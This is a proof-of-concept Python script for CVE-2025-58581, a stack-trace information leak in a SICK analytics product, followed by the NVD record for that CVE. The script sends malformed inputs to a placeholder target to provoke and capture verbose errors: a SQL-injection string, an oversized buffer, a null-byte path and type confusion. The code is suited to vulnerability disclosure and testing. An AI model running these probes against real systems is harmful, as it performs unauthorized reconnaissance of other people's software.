CVE-2025-58581

# CVE-2025-58581 PoC - SICK Product Stack Trace Information Disclosure # This PoC demonstrates how to trigger verbose error messages # that leak internal application information via stack traces. import requests import re from urllib.parse import urljoin TARGET_URL = "https://target-sick-product.example.com" AUTH_COOKIE = {"session": "authenticated_session_token"} # Low-privilege auth required def trigger_stacktrace(endpoint, method="GET", data=None, params=None, headers=None): """ Send a malformed request to trigger an unhandled exception and capture the leaked stack trace. """ url = urljoin(TARGET_URL, endpoint) default_headers = { "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher/1.0)", "Accept": "application/json" } if headers: default_headers.update(headers) try: if method.upper() == "GET": resp = requests.get(url, params=params, cookies=AUTH_COOKIE, headers=default_headers, timeout=10, verify=False) elif method.upper() == "POST": resp = requests.post(url, json=data, cookies=AUTH_COOKIE, headers=default_headers, timeout=10, verify=False) else: resp = requests.request(method, url, cookies=AUTH_COOKIE, headers=default_headers, timeout=10, verify=False) # Check if response contains a stack trace stacktrace_patterns = [ r'at\s+[\w\.$<>]+\([\w\.]+:\d+\)', # Java style r'at\s+[\w\.]+\s+in\s+[\w\\:\\]+\s+line\s+\d+', # .NET style r'File "[^"]+", line \d+', # Python style r'Traceback \(most recent call last\)', # Python traceback r'Exception in thread', # Java exception r'System\.[A-Za-z]+Exception', # .NET exception ] for pattern in stacktrace_patterns: if re.search(pattern, resp.text): print(f"[+] Stack trace detected at {endpoint}") print(f"[+] Status code: {resp.status_code}") print(f"[+] Leaked information:\n{resp.text[:2000]}") return resp.text except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None # Test 1: Trigger error with malformed JSON payload print("[*] Test 1: Malformed JSON payload") trigger_stacktrace("/api/v1/config", method="POST", data={"invalid": "\x00\xff\xfe malformed"}) # Test 2: Trigger error with SQL-like input in parameter print("\n[*] Test 2: Special characters in parameter") trigger_stacktrace("/api/v1/device/status", params={"id": "' OR '1'='1"}) # Test 3: Trigger error with very long input (buffer overflow attempt) print("\n[*] Test 3: Oversized input") trigger_stacktrace("/api/v1/user/profile", method="POST", data={"name": "A" * 100000}) # Test 4: Trigger error with null bytes print("\n[*] Test 4: Null byte injection") trigger_stacktrace("/api/v1/file/read", params={"path": "file.txt\x00.jpg"}) # Test 5: Trigger error with type confusion print("\n[*] Test 5: Type confusion") trigger_stacktrace("/api/v1/settings", method="POST", data={"timeout": {"nested": "object instead of integer"}}) print("\n[*] PoC execution completed.")

{"cve": {"id": "CVE-2025-58581", "sourceIdentifier": "[email protected]", "published": "2025-10-06T07:15:34.567", "lastModified": "2026-01-27T16:44:31.787", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "When an error occurs in the application a full stacktrace is provided to the user. The stacktrace lists class and method names as well as other internal information. An attacker can thus obtain information about the technology used and the structure of the application."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sick:enterprise_analytics:*:*:*:*:*:*:*:*", "matchCriteriaId": "04E8EA78-2780-40C0-B5BA-6CF99DE6355B"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2025/sca-2025-0010.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}